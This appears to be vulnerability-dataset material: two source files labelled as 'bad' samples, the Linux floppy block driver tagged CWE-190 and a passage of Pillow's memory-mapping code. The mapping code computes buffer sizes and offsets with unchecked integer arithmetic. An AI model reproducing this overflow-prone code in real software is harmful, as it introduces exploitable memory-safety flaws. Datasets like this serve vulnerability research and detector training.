check_disk_change(bdev);
if (test_bit(FD_DISK_CHANGED_BIT, &UDRS->flags))
goto out;
if (test_bit(FD_OPEN_SHOULD_FAIL_BIT, &UDRS->flags))
goto out;
}
res = -EROFS;
if ((mode & FMODE_WRITE) &&
!test_bit(FD_DISK_WRITABLE_BIT, &UDRS->flags))
goto out;
}
mutex_unlock(&open_lock);
mutex_unlock(&floppy_mutex);
return 0;
out:
UDRS->fd_ref--;
if (!UDRS->fd_ref)
opened_bdev[drive] = NULL;
out2:
mutex_unlock(&open_lock);
mutex_unlock(&floppy_mutex);
return res;
}
/*
* Check if the disk has been changed or if a change has been faked.
*/
static unsigned int floppy_check_events(struct gendisk *disk,
unsigned int clearing)
{
int drive = (long)disk->private_data;
if (test_bit(FD_DISK_CHANGED_BIT, &UDRS->flags) ||
test_bit(FD_VERIFY_BIT, &UDRS->flags))
return DISK_EVENT_MEDIA_CHANGE;
if (time_after(jiffies, UDRS->last_checked + UDP->checkfreq)) {
if (lock_fdc(drive))
return 0;
poll_drive(false, 0);
process_fd_request();
}
if (test_bit(FD_DISK_CHANGED_BIT, &UDRS->flags) ||
test_bit(FD_VERIFY_BIT, &UDRS->flags) ||
test_bit(drive, &fake_change) ||
drive_no_geom(drive))
return DISK_EVENT_MEDIA_CHANGE;
return 0;
}
/*
* This implements "read block 0" for floppy_revalidate().
* Needed for format autodetection, checking whether there is
* a disk in the drive, and whether that disk is writable.
*/
struct rb0_cbdata {
int drive;
struct completion complete;
};
static void floppy_rb0_cb(struct bio *bio)
{
struct rb0_cbdata *cbdata = (struct rb0_cbdata *)bio->bi_private;
int drive = cbdata->drive;
if (bio->bi_status) {
pr_info("floppy: error %d while reading block 0\n",
bio->bi_status);
set_bit(FD_OPEN_SHOULD_FAIL_BIT, &UDRS->flags);
}
complete(&cbdata->complete);
}
static int __floppy_read_block_0(struct block_device *bdev, int drive)
{
struct bio bio;
struct bio_vec bio_vec;
struct page *page;
struct rb0_cbdata cbdata;
size_t size;
page = alloc_page(GFP_NOIO);
if (!page) {
process_fd_request();
return -ENOMEM;
}
size = bdev->bd_block_size;
if (!size)
size = 1024;
cbdata.drive = drive;
bio_init(&bio, &bio_vec, 1);
bio_set_dev(&bio, bdev);
bio_add_page(&bio, page, size, 0);
bio.bi_iter.bi_sector = 0;
bio.bi_flags |= (1 << BIO_QUIET);
bio.bi_private = &cbdata;
bio.bi_end_io = floppy_rb0_cb;
bio_set_op_attrs(&bio, REQ_OP_READ, 0);
init_completion(&cbdata.complete);
submit_bio(&bio);
process_fd_request();
wait_for_completion(&cbdata.complete);
__free_page(page);
return 0;
}
/* revalidate the floppy disk, i.e. trigger format autodetection by reading
* the bootblock (block 0). "Autodetection" is also needed to check whether
* there is a disk in the drive at all... Thus we also do it for fixed
* geometry formats */
static int floppy_revalidate(struct gendisk *disk)
{
int drive = (long)disk->private_data;
int cf;
int res = 0;
if (test_bit(FD_DISK_CHANGED_BIT, &UDRS->flags) ||
test_bit(FD_VERIFY_BIT, &UDRS->flags) ||
test_bit(drive, &fake_change) ||
drive_no_geom(drive)) {
if (WARN(atomic_read(&usage_count) == 0,
"VFS: revalidate called on non-open device.\n"))
return -EFAULT;
res = lock_fdc(drive);
if (res)
return res;
cf = (test_bit(FD_DISK_CHANGED_BIT, &UDRS->flags) ||
test_bit(FD_VERIFY_BIT, &UDRS->flags));
if (!(cf || test_bit(drive, &fake_change) || drive_no_geom(drive))) {
process_fd_request(); /*already done by another thread */
return 0;
}
UDRS->maxblock = 0;
UDRS->maxtrack = 0;
if (buffer_drive == drive)
buffer_track = -1;
clear_bit(drive, &fake_change);
clear_bit(FD_DISK_CHANGED_BIT, &UDRS->flags);
if (cf)
UDRS->generation++;
if (drive_no_geom(drive)) {
/* auto-sensing */
res = __floppy_read_block_0(opened_bdev[drive], drive);
} else {
if (cf)
poll_drive(false, FD_RAW_NEED_DISK);
process_fd_request();
}
}
set_capacity(disk, floppy_sizes[UDRS->fd_device]);
return res;
}
static const struct block_device_operations floppy_fops = {
.owner = THIS_MODULE,
.open = floppy_open,
.release = floppy_release,
.ioctl = fd_ioctl,
.getgeo = fd_getgeo,
.check_events = floppy_check_events,
.revalidate_disk = floppy_revalidate,
#ifdef CONFIG_COMPAT
.compat_ioctl = fd_compat_ioctl,
#endif
};
/*
* Floppy Driver initialization
* =============================
*/
/* Determine the floppy disk controller type */
/* This routine was written by David C. Niemi */
static char __init get_fdc_version(void)
{
int r;
output_byte(FD_DUMPREGS); /* 82072 and better know DUMPREGS */
if (FDCS->reset)
return FDC_NONE;
r = result();
if (r <= 0x00)
return FDC_NONE; /* No FDC present ??? */
if ((r == 1) && (reply_buffer[0] == 0x80)) {
pr_info("FDC %d is an 8272A\n", fdc);
return FDC_8272A; /* 8272a/765 don't know DUMPREGS */
}
if (r != 10) {
pr_info("FDC %d init: DUMPREGS: unexpected return of %d bytes.\n",
fdc, r);
return FDC_UNKNOWN;
}
if (!fdc_configure()) {
pr_info("FDC %d is an 82072\n", fdc);
return FDC_82072; /* 82072 doesn't know CONFIGURE */
}
output_byte(FD_PERPENDICULAR);
if (need_more_output() == MORE_OUTPUT) {
output_byte(0);
} else {
pr_info("FDC %d is an 82072A\n", fdc);
return FDC_82072A; /* 82072A as found on Sparcs. */
}
output_byte(FD_UNLOCK);
r = result();
if ((r == 1) && (reply_buffer[0] == 0x80)) {
pr_info("FDC %d is a pre-1991 82077\n", fdc);
return FDC_82077_ORIG; /* Pre-1991 82077, doesn't know
* LOCK/UNLOCK */
}
if ((r != 1) || (reply_buffer[0] != 0x00)) {
pr_info("FDC %d init: UNLOCK: unexpected return of %d bytes.\n",
fdc, r);
return FDC_UNKNOWN;
}
output_byte(FD_PARTID);
r = result();
if (r != 1) {
pr_info("FDC %d init: PARTID: unexpected return of %d bytes.\n",
fdc, r);
return FDC_UNKNOWN;
}
if (reply_buffer[0] == 0x80) {
pr_info("FDC %d is a post-1991 82077\n", fdc);
return FDC_82077; /* Revised 82077AA passes all the tests */
}
switch (reply_buffer[0] >> 5) {
case 0x0:
/* Either a 82078-1 or a 82078SL running at 5Volt */
pr_info("FDC %d is an 82078.\n", fdc);
return FDC_82078;
case 0x1:
pr_info("FDC %d is a 44pin 82078\n", fdc);
return FDC_82078;
case 0x2:
pr_info("FDC %d is a S82078B\n", fdc);
return FDC_S82078B;
case 0x3:
pr_info("FDC %d is a National Semiconductor PC87306\n", fdc);
return FDC_87306;
default:
pr_info("FDC %d init: 82078 variant with unknown PARTID=%d.\n",
fdc, reply_buffer[0] >> 5);
return FDC_82078_UNKN;
}
} /* get_fdc_version */
/* lilo configuration */
static void __init floppy_set_flags(int *ints, int param, int param2)
{
int i;
for (i = 0; i < ARRAY_SIZE(default_drive_params); i++) {
if (param)
default_drive_params[i].params.flags |= param2;
else
default_drive_params[i].params.flags &= ~param2;
}
DPRINT("%s flag 0x%x\n", param2 ? "Setting" : "Clearing", param);
}
static void __init daring(int *ints, int param, int param2)
{
int i;
for (i = 0; i < ARRAY_SIZE(default_drive_params); i++) {
if (param) {
default_drive_params[i].params.select_delay = 0;
default_drive_params[i].params.flags |=
FD_SILENT_DCL_CLEAR;
} else {
default_drive_params[i].params.select_delay =
2 * HZ / 100;
default_drive_params[i].params.flags &=
~FD_SILENT_DCL_CLEAR;
}
}
DPRINT("Assuming %s floppy hardware\n", param ? "standard" : "broken");
}
static void __init set_cmos(int *ints, int dummy, int dummy2)
{
int current_drive = 0;
if (ints[0] != 2) {
DPRINT("wrong number of parameters for CMOS\n");
return;
}
current_drive = ints[1];
if (current_drive < 0 || current_drive >= 8) {
DPRINT("bad drive for set_cmos\n");
return;
}
#if N_FDC > 1
if (current_drive >= 4 && !FDC2)
FDC2 = 0x370;
#endif
DP->cmos = ints[2];
DPRINT("setting CMOS code to %d\n", ints[2]);
}
static struct param_table {
const char *name;
void (*fn) (int *ints, int param, int param2);
int *var;
int def_param;
int param2;
} config_params[] __initdata = {
{"allowed_drive_mask", NULL, &allowed_drive_mask, 0xff, 0}, /* obsolete */
{"all_drives", NULL, &allowed_drive_mask, 0xff, 0}, /* obsolete */
{"asus_pci", NULL, &allowed_drive_mask, 0x33, 0},
{"irq", NULL, &FLOPPY_IRQ, 6, 0},
{"dma", NULL, &FLOPPY_DMA, 2, 0},
{"daring", daring, NULL, 1, 0},
#if N_FDC > 1
{"two_fdc", NULL, &FDC2, 0x370, 0},
{"one_fdc", NULL, &FDC2, 0, 0},
#endif
{"thinkpad", floppy_set_flags, NULL, 1, FD_INVERTED_DCL},
{"broken_dcl", floppy_set_flags, NULL, 1, FD_BROKEN_DCL},
{"messages", floppy_set_flags, NULL, 1, FTD_MSG},
{"silent_dcl_clear", floppy_set_flags, NULL, 1, FD_SILENT_DCL_CLEAR},
{"debug", floppy_set_flags, NULL, 1, FD_DEBUG},
{"nodma", NULL, &can_use_virtual_dma, 1, 0},
{"omnibook", NULL, &can_use_virtual_dma, 1, 0},
{"yesdma", NULL, &can_use_virtual_dma, 0, 0},
{"fifo_depth", NULL, &fifo_depth, 0xa, 0},
{"nofifo", NULL, &no_fifo, 0x20, 0},
{"usefifo", NULL, &no_fifo, 0, 0},
{"cmos", set_cmos, NULL, 0, 0},
{"slow", NULL, &slow_floppy, 1, 0},
{"unexpected_interrupts", NULL, &print_unex, 1, 0},
{"no_unexpected_interrupts", NULL, &print_unex, 0, 0},
{"L40SX", NULL, &print_unex, 0, 0}
EXTRA_FLOPPY_PARAMS
};
static int __init floppy_setup(char *str)
{
int i;
int param;
int ints[11];
str = get_options(str, ARRAY_SIZE(ints), ints);
if (str) {
for (i = 0; i < ARRAY_SIZE(config_params); i++) {
if (strcmp(str, config_params[i].name) == 0) {
if (ints[0])
param = ints[1];
else
param = config_params[i].def_param;
if (config_params[i].fn)
config_params[i].fn(ints, param,
config_params[i].
param2);
if (config_params[i].var) {
DPRINT("%s=%d\n", str, param);
*config_params[i].var = param;
}
return 1;
}
}
}
if (str) {
DPRINT("unknown floppy option [%s]\n", str);
DPRINT("allowed options are:");
for (i = 0; i < ARRAY_SIZE(config_params); i++)
pr_cont(" %s", config_params[i].name);
pr_cont("\n");
} else
DPRINT("botched floppy option\n");
DPRINT("Read Documentation/blockdev/floppy.txt\n");
return 0;
}
static int have_no_fdc = -ENODEV;
static ssize_t floppy_cmos_show(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct platform_device *p = to_platform_device(dev);
int drive;
drive = p->id;
return sprintf(buf, "%X\n", UDP->cmos);
}
static DEVICE_ATTR(cmos, 0444, floppy_cmos_show, NULL);
static struct attribute *floppy_dev_attrs[] = {
&dev_attr_cmos.attr,
NULL
};
ATTRIBUTE_GROUPS(floppy_dev);
static void floppy_device_release(struct device *dev)
{
}
static int floppy_resume(struct device *dev)
{
int fdc;
for (fdc = 0; fdc < N_FDC; fdc++)
if (FDCS->address != -1)
user_reset_fdc(-1, FD_RESET_ALWAYS, false);
return 0;
}
static const struct dev_pm_ops floppy_pm_ops = {
.resume = floppy_resume,
.restore = floppy_resume,
};
static struct platform_driver floppy_driver = {
.driver = {
.name = "floppy",
.pm = &floppy_pm_ops,
},
};
static const struct blk_mq_ops floppy_mq_ops = {
.queue_rq = floppy_queue_rq,
};
static struct platform_device floppy_device[N_DRIVE];
static bool floppy_available(int drive)
{
if (!(allowed_drive_mask & (1 << drive)))
return false;
if (fdc_state[FDC(drive)].version == FDC_NONE)
return false;
return true;
}
static struct kobject *floppy_find(dev_t dev, int *part, void *data)
{
int drive = (*part & 3) | ((*part & 0x80) >> 5);
if (drive >= N_DRIVE || !floppy_available(drive))
return NULL;
if (((*part >> 2) & 0x1f) >= ARRAY_SIZE(floppy_type))
return NULL;
*part = 0;
return get_disk_and_module(disks[drive]);
}
static int __init do_floppy_init(void)
{
int i, unit, drive, err;
set_debugt();
interruptjiffies = resultjiffies = jiffies;
#if defined(CONFIG_PPC)
if (check_legacy_ioport(FDC1))
return -ENODEV;
#endif
raw_cmd = NULL;
floppy_wq = alloc_ordered_workqueue("floppy", 0);
if (!floppy_wq)
return -ENOMEM;
for (drive = 0; drive < N_DRIVE; drive++) {
disks[drive] = alloc_disk(1);
if (!disks[drive]) {
err = -ENOMEM;
goto out_put_disk;
}
disks[drive]->queue = blk_mq_init_sq_queue(&tag_sets[drive],
&floppy_mq_ops, 2,
BLK_MQ_F_SHOULD_MERGE);
if (IS_ERR(disks[drive]->queue)) {
err = PTR_ERR(disks[drive]->queue);
disks[drive]->queue = NULL;
goto out_put_disk;
}
blk_queue_bounce_limit(disks[drive]->queue, BLK_BOUNCE_HIGH);
blk_queue_max_hw_sectors(disks[drive]->queue, 64);
disks[drive]->major = FLOPPY_MAJOR;
disks[drive]->first_minor = TOMINOR(drive);
disks[drive]->fops = &floppy_fops;
disks[drive]->events = DISK_EVENT_MEDIA_CHANGE;
sprintf(disks[drive]->disk_name, "fd%d", drive);
timer_setup(&motor_off_timer[drive], motor_off_callback, 0);
}
err = register_blkdev(FLOPPY_MAJOR, "fd");
if (err)
goto out_put_disk;
err = platform_driver_register(&floppy_driver);
if (err)
goto out_unreg_blkdev;
blk_register_region(MKDEV(FLOPPY_MAJOR, 0), 256, THIS_MODULE,
floppy_find, NULL, NULL);
for (i = 0; i < 256; i++)
if (ITYPE(i))
floppy_sizes[i] = floppy_type[ITYPE(i)].size;
else
floppy_sizes[i] = MAX_DISK_SIZE << 1;
reschedule_timeout(MAXTIMEOUT, "floppy init");
config_types();
for (i = 0; i < N_FDC; i++) {
fdc = i;
memset(FDCS, 0, sizeof(*FDCS));
FDCS->dtr = -1;
FDCS->dor = 0x4;
#if defined(__sparc__) || defined(__mc68000__)
/*sparcs/sun3x don't have a DOR reset which we can fall back on to */
#ifdef __mc68000__
if (MACH_IS_SUN3X)
#endif
FDCS->version = FDC_82072A;
#endif
}
use_virtual_dma = can_use_virtual_dma & 1;
fdc_state[0].address = FDC1;
if (fdc_state[0].address == -1) {
cancel_delayed_work(&fd_timeout);
err = -ENODEV;
goto out_unreg_region;
}
#if N_FDC > 1
fdc_state[1].address = FDC2;
#endif
fdc = 0; /* reset fdc in case of unexpected interrupt */
err = floppy_grab_irq_and_dma();
if (err) {
cancel_delayed_work(&fd_timeout);
err = -EBUSY;
goto out_unreg_region;
}
/* initialise drive state */
for (drive = 0; drive < N_DRIVE; drive++) {
memset(UDRS, 0, sizeof(*UDRS));
memset(UDRWE, 0, sizeof(*UDRWE));
set_bit(FD_DISK_NEWCHANGE_BIT, &UDRS->flags);
set_bit(FD_DISK_CHANGED_BIT, &UDRS->flags);
set_bit(FD_VERIFY_BIT, &UDRS->flags);
UDRS->fd_device = -1;
floppy_track_buffer = NULL;
max_buffer_sectors = 0;
}
/*
* Small 10 msec delay to let through any interrupt that
* initialization might have triggered, to not
* confuse detection:
*/
msleep(10);
for (i = 0; i < N_FDC; i++) {
fdc = i;
FDCS->driver_version = FD_DRIVER_VERSION;
for (unit = 0; unit < 4; unit++)
FDCS->track[unit] = 0;
if (FDCS->address == -1)
continue;
FDCS->rawcmd = 2;
if (user_reset_fdc(-1, FD_RESET_ALWAYS, false)) {
/* free ioports reserved by floppy_grab_irq_and_dma() */
floppy_release_regions(fdc);
FDCS->address = -1;
FDCS->version = FDC_NONE;
continue;
}
/* Try to determine the floppy controller type */
FDCS->version = get_fdc_version();
if (FDCS->version == FDC_NONE) {
/* free ioports reserved by floppy_grab_irq_and_dma() */
floppy_release_regions(fdc);
FDCS->address = -1;
continue;
}
if (can_use_virtual_dma == 2 && FDCS->version < FDC_82072A)
can_use_virtual_dma = 0;
have_no_fdc = 0;
/* Not all FDCs seem to be able to handle the version command
* properly, so force a reset for the standard FDC clones,
* to avoid interrupt garbage.
*/
user_reset_fdc(-1, FD_RESET_ALWAYS, false);
}
fdc = 0;
cancel_delayed_work(&fd_timeout);
current_drive = 0;
initialized = true;
if (have_no_fdc) {
DPRINT("no floppy controllers found\n");
err = have_no_fdc;
goto out_release_dma;
}
for (drive = 0; drive < N_DRIVE; drive++) {
if (!floppy_available(drive))
continue;
floppy_device[drive].name = floppy_device_name;
floppy_device[drive].id = drive;
floppy_device[drive].dev.release = floppy_device_release;
floppy_device[drive].dev.groups = floppy_dev_groups;
err = platform_device_register(&floppy_device[drive]);
if (err)
goto out_remove_drives;
/* to be cleaned up... */
disks[drive]->private_data = (void *)(long)drive;
disks[drive]->flags |= GENHD_FL_REMOVABLE;
device_add_disk(&floppy_device[drive].dev, disks[drive], NULL);
}
return 0;
out_remove_drives:
while (drive--) {
if (floppy_available(drive)) {
del_gendisk(disks[drive]);
platform_device_unregister(&floppy_device[drive]);
}
}
out_release_dma:
if (atomic_read(&usage_count))
floppy_release_irq_and_dma();
out_unreg_region:
blk_unregister_region(MKDEV(FLOPPY_MAJOR, 0), 256);
platform_driver_unregister(&floppy_driver);
out_unreg_blkdev:
unregister_blkdev(FLOPPY_MAJOR, "fd");
out_put_disk:
destroy_workqueue(floppy_wq);
for (drive = 0; drive < N_DRIVE; drive++) {
if (!disks[drive])
break;
if (disks[drive]->queue) {
del_timer_sync(&motor_off_timer[drive]);
blk_cleanup_queue(disks[drive]->queue);
disks[drive]->queue = NULL;
blk_mq_free_tag_set(&tag_sets[drive]);
}
put_disk(disks[drive]);
}
return err;
}
#ifndef MODULE
static __init void floppy_async_init(void *data, async_cookie_t cookie)
{
do_floppy_init();
}
#endif
static int __init floppy_init(void)
{
#ifdef MODULE
return do_floppy_init();
#else
/* Don't hold up the bootup by the floppy initialization */
async_schedule(floppy_async_init, NULL);
return 0;
#endif
}
static const struct io_region {
int offset;
int size;
} io_regions[] = {
{ 2, 1 },
/* address + 3 is sometimes reserved by pnp bios for motherboard */
{ 4, 2 },
/* address + 6 is reserved, and may be taken by IDE.
* Unfortunately, Adaptec doesn't know this :-(, */
{ 7, 1 },
};
static void floppy_release_allocated_regions(int fdc, const struct io_region *p)
{
while (p != io_regions) {
p--;
release_region(FDCS->address + p->offset, p->size);
}
}
#define ARRAY_END(X) (&((X)[ARRAY_SIZE(X)]))
static int floppy_request_regions(int fdc)
{
const struct io_region *p;
for (p = io_regions; p < ARRAY_END(io_regions); p++) {
if (!request_region(FDCS->address + p->offset,
p->size, "floppy")) {
DPRINT("Floppy io-port 0x%04lx in use\n",
FDCS->address + p->offset);
floppy_release_allocated_regions(fdc, p);
return -EBUSY;
}
}
return 0;
}
static void floppy_release_regions(int fdc)
{
floppy_release_allocated_regions(fdc, ARRAY_END(io_regions));
}
static int floppy_grab_irq_and_dma(void)
{
if (atomic_inc_return(&usage_count) > 1)
return 0;
/*
* We might have scheduled a free_irq(), wait it to
* drain first:
*/
flush_workqueue(floppy_wq);
if (fd_request_irq()) {
DPRINT("Unable to grab IRQ%d for the floppy driver\n",
FLOPPY_IRQ);
atomic_dec(&usage_count);
return -1;
}
if (fd_request_dma()) {
DPRINT("Unable to grab DMA%d for the floppy driver\n",
FLOPPY_DMA);
if (can_use_virtual_dma & 2)
use_virtual_dma = can_use_virtual_dma = 1;
if (!(can_use_virtual_dma & 1)) {
fd_free_irq();
atomic_dec(&usage_count);
return -1;
}
}
for (fdc = 0; fdc < N_FDC; fdc++) {
if (FDCS->address != -1) {
if (floppy_request_regions(fdc))
goto cleanup;
}
}
for (fdc = 0; fdc < N_FDC; fdc++) {
if (FDCS->address != -1) {
reset_fdc_info(1);
fd_outb(FDCS->dor, FD_DOR);
}
}
fdc = 0;
set_dor(0, ~0, 8); /* avoid immediate interrupt */
for (fdc = 0; fdc < N_FDC; fdc++)
if (FDCS->address != -1)
fd_outb(FDCS->dor, FD_DOR);
/*
* The driver will try and free resources and relies on us
* to know if they were allocated or not.
*/
fdc = 0;
irqdma_allocated = 1;
return 0;
cleanup:
fd_free_irq();
fd_free_dma();
while (--fdc >= 0)
floppy_release_regions(fdc);
atomic_dec(&usage_count);
return -1;
}
static void floppy_release_irq_and_dma(void)
{
int old_fdc;
#ifndef __sparc__
int drive;
#endif
long tmpsize;
unsigned long tmpaddr;
if (!atomic_dec_and_test(&usage_count))
return;
if (irqdma_allocated) {
fd_disable_dma();
fd_free_dma();
fd_free_irq();
irqdma_allocated = 0;
}
set_dor(0, ~0, 8);
#if N_FDC > 1
set_dor(1, ~8, 0);
#endif
if (floppy_track_buffer && max_buffer_sectors) {
tmpsize = max_buffer_sectors * 1024;
tmpaddr = (unsigned long)floppy_track_buffer;
floppy_track_buffer = NULL;
max_buffer_sectors = 0;
buffer_min = buffer_max = -1;
fd_dma_mem_free(tmpaddr, tmpsize);
}
#ifndef __sparc__
for (drive = 0; drive < N_FDC * 4; drive++)
if (timer_pending(motor_off_timer + drive))
pr_info("motor off timer %d still active\n", drive);
#endif
if (delayed_work_pending(&fd_timeout))
pr_info("floppy timer still active:%s\n", timeout_message);
if (delayed_work_pending(&fd_timer))
pr_info("auxiliary floppy timer still active\n");
if (work_pending(&floppy_work))
pr_info("work still pending\n");
old_fdc = fdc;
for (fdc = 0; fdc < N_FDC; fdc++)
if (FDCS->address != -1)
floppy_release_regions(fdc);
fdc = old_fdc;
}
#ifdef MODULE
static char *floppy;
static void __init parse_floppy_cfg_string(char *cfg)
{
char *ptr;
while (*cfg) {
ptr = cfg;
while (*cfg && *cfg != ' ' && *cfg != '\t')
cfg++;
if (*cfg) {
*cfg = '\0';
cfg++;
}
if (*ptr)
floppy_setup(ptr);
}
}
static int __init floppy_module_init(void)
{
if (floppy)
parse_floppy_cfg_string(floppy);
return floppy_init();
}
module_init(floppy_module_init);
static void __exit floppy_module_exit(void)
{
int drive;
blk_unregister_region(MKDEV(FLOPPY_MAJOR, 0), 256);
unregister_blkdev(FLOPPY_MAJOR, "fd");
platform_driver_unregister(&floppy_driver);
destroy_workqueue(floppy_wq);
for (drive = 0; drive < N_DRIVE; drive++) {
del_timer_sync(&motor_off_timer[drive]);
if (floppy_available(drive)) {
del_gendisk(disks[drive]);
platform_device_unregister(&floppy_device[drive]);
}
blk_cleanup_queue(disks[drive]->queue);
blk_mq_free_tag_set(&tag_sets[drive]);
/*
* These disks have not called add_disk(). Don't put down
* queue reference in put_disk().
*/
if (!(allowed_drive_mask & (1 << drive)) ||
fdc_state[FDC(drive)].version == FDC_NONE)
disks[drive]->queue = NULL;
put_disk(disks[drive]);
}
cancel_delayed_work_sync(&fd_timeout);
cancel_delayed_work_sync(&fd_timer);
if (atomic_read(&usage_count))
floppy_release_irq_and_dma();
/* eject disk, if any */
fd_eject(0);
}
module_exit(floppy_module_exit);
module_param(floppy, charp, 0);
module_param(FLOPPY_IRQ, int, 0);
module_param(FLOPPY_DMA, int, 0);
MODULE_AUTHOR("Alain L. Knaff");
MODULE_SUPPORTED_DEVICE("fd");
MODULE_LICENSE("GPL");
/* This doesn't actually get used other than for module information */
static const struct pnp_device_id floppy_pnpids[] = {
{"PNP0700", 0},
{}
};
MODULE_DEVICE_TABLE(pnp, floppy_pnpids);
#else
__setup("floppy=", floppy_setup);
module_init(floppy_init)
#endif
MODULE_ALIAS_BLOCKDEV_MAJOR(FLOPPY_MAJOR);
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_966_0 |
crossvul-cpp_data_bad_5395_2 | /*
* The Python Imaging Library.
*
* standard memory mapping interface for the Imaging library
*
* history:
* 1998-03-05 fl added Win32 read mapping
* 1999-02-06 fl added "I;16" support
* 2003-04-21 fl added PyImaging_MapBuffer primitive
*
* Copyright (c) 1998-2003 by Secret Labs AB.
* Copyright (c) 2003 by Fredrik Lundh.
*
* See the README file for information on usage and redistribution.
*/
/*
* FIXME: should move the memory mapping primitives into libImaging!
*/
#include "Python.h"
#include "Imaging.h"
#include "py3.h"
/* compatibility wrappers (defined in _imaging.c) */
extern int PyImaging_CheckBuffer(PyObject* buffer);
extern int PyImaging_GetBuffer(PyObject* buffer, Py_buffer *view);
/* -------------------------------------------------------------------- */
/* Standard mapper */
typedef struct {
PyObject_HEAD
char* base;
int size;
int offset;
#ifdef _WIN32
HANDLE hFile;
HANDLE hMap;
#endif
} ImagingMapperObject;
static PyTypeObject ImagingMapperType;
ImagingMapperObject*
PyImaging_MapperNew(const char* filename, int readonly)
{
ImagingMapperObject *mapper;
if (PyType_Ready(&ImagingMapperType) < 0)
return NULL;
mapper = PyObject_New(ImagingMapperObject, &ImagingMapperType);
if (mapper == NULL)
return NULL;
mapper->base = NULL;
mapper->size = mapper->offset = 0;
#ifdef _WIN32
mapper->hFile = (HANDLE)-1;
mapper->hMap = (HANDLE)-1;
/* FIXME: currently supports readonly mappings only */
mapper->hFile = CreateFile(
filename,
GENERIC_READ,
FILE_SHARE_READ,
NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (mapper->hFile == (HANDLE)-1) {
PyErr_SetString(PyExc_IOError, "cannot open file");
Py_DECREF(mapper);
return NULL;
}
mapper->hMap = CreateFileMapping(
mapper->hFile, NULL,
PAGE_READONLY,
0, 0, NULL);
if (mapper->hMap == (HANDLE)-1) {
CloseHandle(mapper->hFile);
PyErr_SetString(PyExc_IOError, "cannot map file");
Py_DECREF(mapper);
return NULL;
}
mapper->base = (char*) MapViewOfFile(
mapper->hMap,
FILE_MAP_READ,
0, 0, 0);
mapper->size = GetFileSize(mapper->hFile, 0);
#endif
return mapper;
}
static void
mapping_dealloc(ImagingMapperObject* mapper)
{
#ifdef _WIN32
if (mapper->base != 0)
UnmapViewOfFile(mapper->base);
if (mapper->hMap != (HANDLE)-1)
CloseHandle(mapper->hMap);
if (mapper->hFile != (HANDLE)-1)
CloseHandle(mapper->hFile);
mapper->base = 0;
mapper->hMap = mapper->hFile = (HANDLE)-1;
#endif
PyObject_Del(mapper);
}
/* -------------------------------------------------------------------- */
/* standard file operations */
static PyObject*
mapping_read(ImagingMapperObject* mapper, PyObject* args)
{
PyObject* buf;
int size = -1;
if (!PyArg_ParseTuple(args, "|i", &size))
return NULL;
/* check size */
if (size < 0 || mapper->offset + size > mapper->size)
size = mapper->size - mapper->offset;
if (size < 0)
size = 0;
buf = PyBytes_FromStringAndSize(NULL, size);
if (!buf)
return NULL;
if (size > 0) {
memcpy(PyBytes_AsString(buf), mapper->base + mapper->offset, size);
mapper->offset += size;
}
return buf;
}
static PyObject*
mapping_seek(ImagingMapperObject* mapper, PyObject* args)
{
int offset;
int whence = 0;
if (!PyArg_ParseTuple(args, "i|i", &offset, &whence))
return NULL;
switch (whence) {
case 0: /* SEEK_SET */
mapper->offset = offset;
break;
case 1: /* SEEK_CUR */
mapper->offset += offset;
break;
case 2: /* SEEK_END */
mapper->offset = mapper->size + offset;
break;
default:
/* FIXME: raise ValueError? */
break;
}
Py_INCREF(Py_None);
return Py_None;
}
/* -------------------------------------------------------------------- */
/* map entire image */
extern PyObject*PyImagingNew(Imaging im);
static void
ImagingDestroyMap(Imaging im)
{
return; /* nothing to do! */
}
static PyObject*
mapping_readimage(ImagingMapperObject* mapper, PyObject* args)
{
int y, size;
Imaging im;
char* mode;
int xsize;
int ysize;
int stride;
int orientation;
if (!PyArg_ParseTuple(args, "s(ii)ii", &mode, &xsize, &ysize,
&stride, &orientation))
return NULL;
if (stride <= 0) {
/* FIXME: maybe we should call ImagingNewPrologue instead */
if (!strcmp(mode, "L") || !strcmp(mode, "P"))
stride = xsize;
else if (!strcmp(mode, "I;16") || !strcmp(mode, "I;16B"))
stride = xsize * 2;
else
stride = xsize * 4;
}
size = ysize * stride;
if (mapper->offset + size > mapper->size) {
PyErr_SetString(PyExc_IOError, "image file truncated");
return NULL;
}
im = ImagingNewPrologue(mode, xsize, ysize);
if (!im)
return NULL;
/* setup file pointers */
if (orientation > 0)
for (y = 0; y < ysize; y++)
im->image[y] = mapper->base + mapper->offset + y * stride;
else
for (y = 0; y < ysize; y++)
im->image[ysize-y-1] = mapper->base + mapper->offset + y * stride;
im->destroy = ImagingDestroyMap;
if (!ImagingNewEpilogue(im))
return NULL;
mapper->offset += size;
return PyImagingNew(im);
}
static struct PyMethodDef methods[] = {
/* standard file interface */
{"read", (PyCFunction)mapping_read, 1},
{"seek", (PyCFunction)mapping_seek, 1},
/* extensions */
{"readimage", (PyCFunction)mapping_readimage, 1},
{NULL, NULL} /* sentinel */
};
static PyTypeObject ImagingMapperType = {
PyVarObject_HEAD_INIT(NULL, 0)
"ImagingMapper", /*tp_name*/
sizeof(ImagingMapperObject), /*tp_size*/
0, /*tp_itemsize*/
/* methods */
(destructor)mapping_dealloc, /*tp_dealloc*/
0, /*tp_print*/
0, /*tp_getattr*/
0, /*tp_setattr*/
0, /*tp_compare*/
0, /*tp_repr*/
0, /*tp_as_number */
0, /*tp_as_sequence */
0, /*tp_as_mapping */
0, /*tp_hash*/
0, /*tp_call*/
0, /*tp_str*/
0, /*tp_getattro*/
0, /*tp_setattro*/
0, /*tp_as_buffer*/
Py_TPFLAGS_DEFAULT, /*tp_flags*/
0, /*tp_doc*/
0, /*tp_traverse*/
0, /*tp_clear*/
0, /*tp_richcompare*/
0, /*tp_weaklistoffset*/
0, /*tp_iter*/
0, /*tp_iternext*/
methods, /*tp_methods*/
0, /*tp_members*/
0, /*tp_getset*/
};
PyObject*
PyImaging_Mapper(PyObject* self, PyObject* args)
{
char* filename;
if (!PyArg_ParseTuple(args, "s", &filename))
return NULL;
return (PyObject*) PyImaging_MapperNew(filename, 1);
}
/* -------------------------------------------------------------------- */
/* Buffer mapper */
typedef struct ImagingBufferInstance {
struct ImagingMemoryInstance im;
PyObject* target;
Py_buffer view;
} ImagingBufferInstance;
static void
mapping_destroy_buffer(Imaging im)
{
ImagingBufferInstance* buffer = (ImagingBufferInstance*) im;
PyBuffer_Release(&buffer->view);
Py_XDECREF(buffer->target);
}
PyObject*
PyImaging_MapBuffer(PyObject* self, PyObject* args)
{
Py_ssize_t y, size;
Imaging im;
